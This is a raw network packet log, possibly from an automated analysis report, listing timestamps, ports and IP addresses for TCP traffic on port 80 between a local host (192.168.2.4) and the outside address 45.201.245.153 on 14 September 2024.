Sep 14, 2024 18:31:37.063996077 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064030886 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064049959 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.064084053 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064131975 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.064133883 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064167976 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064199924 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064215899 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.064232111 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064250946 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064275980 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.064956903 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.064990997 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065025091 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065035105 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065073013 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065076113 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065126896 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065159082 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065174103 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065192938 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065226078 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065242052 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065262079 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065310955 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065907955 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065941095 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.065989017 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.065993071 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066025972 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066077948 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.066077948 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066112995 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066145897 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066164970 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.066179037 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066212893 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066225052 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.066865921 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.066920996 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.079838991 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.079893112 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.079924107 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.079957962 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080008030 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080040932 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080049038 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.080049038 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.080073118 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080096960 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.080195904 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080245018 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.080246925 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080281019 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080312967 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.080326080 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.101500034 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.101552010 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.101587057 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.102073908 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.102107048 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.102140903 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.102174044 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.102238894 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.102238894 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149360895 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149414062 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149446964 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149477959 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149528980 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149560928 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149595976 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149595022 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149595022 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149595022 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149629116 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149662971 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149683952 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149697065 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149730921 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149754047 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149764061 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149774075 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.149799109 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.149854898 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150155067 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150187969 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150221109 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150276899 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150290966 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150326014 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150377035 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150377989 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150410891 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150445938 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150470018 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150494099 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150712013 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150841951 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150892973 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150897980 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150928020 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150959969 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.150979996 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.150991917 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151026964 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151060104 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151084900 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151093006 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151103973 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151496887 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151546955 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151555061 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151582003 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151612997 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151665926 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151667118 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151699066 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151732922 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151753902 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151765108 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151773930 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151798964 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151832104 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.151854992 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.151865959 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152405977 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152460098 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152466059 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.152499914 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152550936 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152553082 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.152602911 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.152606010 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152640104 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152672052 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152693033 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.152707100 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152792931 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152826071 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152848959 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.152861118 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.152868986 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.153451920 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153485060 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153537989 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153539896 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.153592110 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153642893 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153645992 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.153676987 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153695107 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.153711081 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153743029 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153764963 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.153775930 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153810024 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153845072 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.153863907 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154401064 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154434919 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154459953 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154480934 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154489040 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154521942 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154573917 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154573917 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154623032 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154656887 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154675007 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154687881 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154721022 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154752970 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154773951 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.154788017 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.154797077 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155349016 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155421972 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155455112 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155457020 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155508041 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155509949 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155543089 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155576944 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155611992 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155632019 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155643940 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155653954 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155678034 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155713081 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.155731916 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.155745983 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.156254053 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.156287909 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.156320095 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.156321049 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.156338930 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.156356096 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.156409979 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.168732882 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.168813944 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.168884039 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.168915987 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.168947935 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169001102 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169033051 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169060946 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.169066906 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169099092 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169131994 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169163942 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169197083 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169215918 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.169215918 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.169229984 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.169253111 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.169253111 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.169262886 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.172498941 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:39.221164942 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:39.229599953 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:39.229779959 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:39.230499983 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:39.235505104 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:39.824506044 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:39.824980974 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:39.829924107 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:39.829977989 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:39.830007076 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055646896 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055705070 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055738926 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055789948 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055824041 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055857897 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055865049 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.055865049 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.055891991 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055932045 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.055942059 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055975914 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.055996895 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.056010008 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.056063890 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.056346893 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.060895920 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.061085939 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.146125078 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146251917 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146284103 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146315098 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146333933 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.146348953 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146380901 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146405935 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.146414042 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146424055 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.146452904 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.146497965 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.147131920 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.147212029 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.147244930 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.147258043 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.147281885 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.147315025 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.147324085 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.148202896 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148235083 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148251057 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.148269892 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148312092 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.148518085 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148571014 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148612976 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.148622036 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148654938 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148689032 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.148704052 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.149616003 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.149666071 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.236510038 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236550093 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236583948 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236615896 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.236690044 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236726046 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236749887 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.236759901 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.236808062 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.237005949 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237225056 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237257004 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237279892 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.237292051 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237349987 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.237582922 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237704992 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237737894 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237757921 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.237771034 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237803936 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237831116 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.237837076 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237873077 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.237899065 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.238501072 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238533974 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238559961 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.238569975 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238619089 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.238675117 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238708973 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238742113 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238766909 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.238778114 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.238827944 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.239305973 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239337921 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239372969 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239403009 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.239439964 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239473104 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239505053 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239506960 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.239538908 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.239568949 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.240303040 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240335941 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240386963 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240401030 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.240418911 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240430117 CEST	49740	80	192.168.2.4	45.201.245.153
